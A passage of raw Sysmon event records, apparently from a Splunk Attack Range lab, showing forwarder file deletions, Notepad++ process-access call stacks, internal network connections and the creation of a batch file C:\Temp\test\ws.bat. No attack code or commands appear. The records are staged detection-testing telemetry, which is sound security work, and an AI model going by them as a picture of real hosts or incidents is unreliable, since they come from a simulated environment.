Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=29AD3ABE04E0E52406EEE7217DA31D5B,SHA256=21DA6DD0E0E8F66406502095CED6E0F72BC4B0235463607E43EA18C7761E48A8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806367Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:39.051{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8E56C5C441B06DB05A87406ECDD8A79F,SHA256=C6C88F5FD7088439C12A768B2B6C143DED63A2341A4376EDBEEC7E4775AFF3BB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001046525Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:39.021{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+81da7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472FF1B5)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9814|C:\Windows\System32\win32u.dll+10c4 10341000x80000000000000001046524Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:45:39.021{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81c2d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\System32\SHELL32.dll+83770|C:\Windows\System32\SHELL32.dll+8369d|C:\Windows\system32\explorerframe.dll+29e56|C:\Windows\system32\explorerframe.dll+c7e6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\USER32.dll+148bf|C:\Windows\System32\USER32.dll+2e967|C:\Windows\System32\USER32.dll+2e813|C:\Windows\System32\USER32.dll+2e6b2|C:\Windows\System32\USER32.dll+2e648|C:\Windows\System32\COMDLG32.dll+13ae4|C:\Program Files\Notepad++\notepad++.exe+169a0f|C:\Program Files\Notepad++\notepad++.exe+1675f3|C:\Program Files\Notepad++\notepad++.exe+202e5a|C:\Program Files\Notepad++\notepad++.exe+202686 10341000x80000000000000001046523Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:39.021{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81ba9|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\System32\SHELL32.dll+83770|C:\Windows\System32\SHELL32.dll+8369d|C:\Windows\system32\explorerframe.dll+29e56|C:\Windows\system32\explorerframe.dll+c7e6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\USER32.dll+148bf|C:\Windows\System32\USER32.dll+2e967|C:\Windows\System32\USER32.dll+2e813|C:\Windows\System32\USER32.dll+2e6b2|C:\Windows\System32\USER32.dll+2e648|C:\Windows\System32\COMDLG32.dll+13ae4|C:\Program Files\Notepad++\notepad++.exe+169a0f|C:\Program Files\Notepad++\notepad++.exe+1675f3|C:\Program Files\Notepad++\notepad++.exe+202e5a|C:\Program Files\Notepad++\notepad++.exe+202686 10341000x80000000000000001046522Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:39.021{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\System32\SHELL32.dll+83770|C:\Windows\System32\SHELL32.dll+8369d|C:\Windows\system32\explorerframe.dll+29e56|C:\Windows\system32\explorerframe.dll+c7e6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\USER32.dll+148bf|C:\Windows\System32\USER32.dll+2e967|C:\Windows\System32\USER32.dll+2e813|C:\Windows\System32\USER32.dll+2e6b2|C:\Windows\System32\USER32.dll+2e648|C:\Windows\System32\COMDLG32.dll+13ae4 10341000x80000000000000001046521Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:39.021{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\System32\SHELL32.dll+83770|C:\Windows\System32\SHELL32.dll+8369d|C:\Windows\system32\explorerframe.dll+29e56|C:\Windows\system32\explorerframe.dll+c7e6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\USER32.dll+148bf|C:\Windows\System32\USER32.dll+2e967|C:\Windows\System32\USER32.dll+2e813|C:\Windows\System32\USER32.dll+2e6b2|C:\Windows\System32\USER32.dll+2e648|C:\Windows\System32\COMDLG32.dll+13ae4|C:\Program Files\Notepad++\notepad++.exe+169a0f 23542300x80000000000000001046531Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:40.803{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F6E06CC378627DFD24846668A1E5B85A,SHA256=AC322519E52F5F281E9A64EC19F5CB38EBB42BF9843CBF7780370C97B66D8D27,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806368Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:40.053{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9A4D00F8E7640EFF11CE961E5B1BB679,SHA256=BBE12AEE72D73F330987AC1A6E295C6F8E9F5DD5CA415C936E1CD50D32A1AC9A,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001046530Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:32.240{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local50929-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local49666- 354300x80000000000000001046529Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:32.240{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local50929-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local49666- 354300x80000000000000001046528Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:32.239{466BC892-02AF-60E8-0D00-00000000CF01}900C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local50928-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local135epmap 354300x80000000000000001046527Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:32.239{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local50928-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local135epmap 23542300x80000000000000001046532Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:41.818{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5AED93FB9566E12DED81DFDBB12507DA,SHA256=3E04773DCB04C4149664C1D63061FA913190136D8AE0CE771CD80EFB37ACAAF3,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806370Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:40.296{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57174-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000806369Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:41.081{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=95820C18C067AB2F8E699875BC7CBF3C,SHA256=8CA745B3A159CB9D7A706F58DB45B39EA789E07EE4BD15D4345FD2DF45E132A0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046540Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:42.836{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AD6F177FCE6B56166E4A5424B781278C,SHA256=827704982673C96AB29FBA87C54D87F40CFBBC89E8BC22BBF3F0D28ABEEF2E51,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806371Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:42.099{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2AA9CA2C29974B01D8125402C7B839E3,SHA256=C9E2013B36FE1679772574681790C17F0742876FFC27DFD798BBE5EA757C6BB9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046539Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:42.539{466BC892-35E4-60E8-4B0C-00000000CF01}7336ATTACKRANGE\bobC:\Program Files\Notepad++\notepad++.exeC:\Users\bob\AppData\Roaming\Notepad++\backup\new 1@2021-07-12_074537MD5=615C8F3EB8FC071E532A0252BEBCCC80,SHA256=CB8F4133557FB2EFB91D2A3DF7ECD71AD31D41E1F1B3F0C8BC7A996A68578352,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001046538Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:42.517{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exeC:\Temp\test\ws.bat2021-07-12 07:45:42.455 10341000x80000000000000001046537Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:42.470{466BC892-32D3-60E8-770B-00000000CF01}63565464C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046536Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:45:42.470{466BC892-32D3-60E8-770B-00000000CF01}63565464C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046535Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:42.470{466BC892-32D3-60E8-770B-00000000CF01}63565464C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x80000000000000001046534Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:42.455{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exeC:\Temp\test\ws.bat2021-07-12 07:45:42.455 354300x80000000000000001046533Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:33.711{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program 
Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50930-false10.0.1.12-8000- 23542300x80000000000000001046545Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:43.869{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=648EF49334BDE26E8F7145BC2CF3C36A,SHA256=4E19C9EF27A2E3BBF844B4DA15F22D82940D9275C6D3D90FF2420B45DAE72ADC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806372Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:43.115{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6B30AEC1887439C059DB7C88956EC75A,SHA256=AF364E7D9F6BB918EC908000E1C763A651AEDF33C435B773F73835A3307394A2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046544Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:43.753{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EAC9D93D5FD6D082CB55C8826AB0AF84,SHA256=45E8F5F835C940D9E65CF94B094786EB923D4A56AF34FE9B77B5AFC8922F6321,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046543Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:43.753{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=27511018F65BD42D749DE47C5DF279E9,SHA256=766B4180F5E9E26BF3E63F7A95B7D65A4E1B597B09EA58647464C55703D834A7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046542Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:43.669{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=B3D5AE835858E906D1E72577C6F345D4,SHA256=81B9B52F606582EF0BAB76BDDEAC11B5A054E348BD2107479BC5BBEF4E1E03B0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046541Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:43.669{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=36293ADF60D97F3305FBC7893C4C418D,SHA256=6AADAF298C86C4A08FDEB75C17B60E913DD726AA7C35BA04F1ADDF92BA474E3F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046546Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:44.883{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FCF7D916ECCCFD05234EF2D93B388F86,SHA256=0174F1A544C63B99CAC4501D0007299CC5B111E44A490AAC2B9D5870F6E57BF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806373Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:44.115{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2D47E9E8C544CACC9B489F5A2FC392D1,SHA256=23F99903A05957766AD71CD1ED1AF83F2437D068B43E49B26B9965C803C8B2FC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046547Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:45.898{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FB42A3D0EA6B56C1FD56EC76F926EC4C,SHA256=52AC6B4041EEAB68F74FEA5180CB15FFBCED75125D541CA272F54B851CAB3A4C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806374Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:45.193{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6E052C05645F42007A8850B510CF2342,SHA256=9C915EBE460EE5BDEC140A8653CA101AD59575C6153997611EA679F68EDDCBAE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046548Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:46.913{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=94017F655C88E0FA40104018B2082212,SHA256=2EB06AA616058015378A5C71610CC5DCEA2BA541D5BC561E4EB31F4B45EBAE28,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806375Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:46.193{0C1E0330-0518-60E8-D300-00000000D001}380NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9A0BD1019A5B68724668E1B923D63FBC,SHA256=1DE46BB39BEA116D4DC6D59C953D06C759446255D7D7FCA03CAEDED3D34CD9FA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046549Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:47.930{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=05A67F11890E328D21E50790C5E18560,SHA256=DCC101D42E9A142B07D5BF0B24541DB8999C21FD27AA942F072F35FE57930A31,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806377Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:46.217{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57175-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000806376Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:47.256{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E9879F70294C66A1C1D522145D89EDD9,SHA256=AD10DA8C090DC5BF660F6D607A2F1E1E5327D475132F0A1F7321ACC081D8EAEB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046551Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:48.949{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=28885835749EBB735D8211DD0F940853,SHA256=AEBB82B5759555A3A54F0963CE4D43FD786A36A2CDCF6DEAA603779B7C0465DC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806378Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:48.271{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=843488F4D819C55E9010514DADC9D893,SHA256=2D0DEEFEC8291D3D0DCFC3626D9B3152669BB6C35FE0736E05772249E30138E2,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001046550Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:39.637{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50931-false10.0.1.12-8000- 23542300x80000000000000001046552Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:49.963{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E975B527C41E159515CD98001474CE94,SHA256=3DD5C1944DC9EA09C492C654A90E02D4BDCB3841CDB68AC3BB0E4FFE64415FD2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806381Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:49.349{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
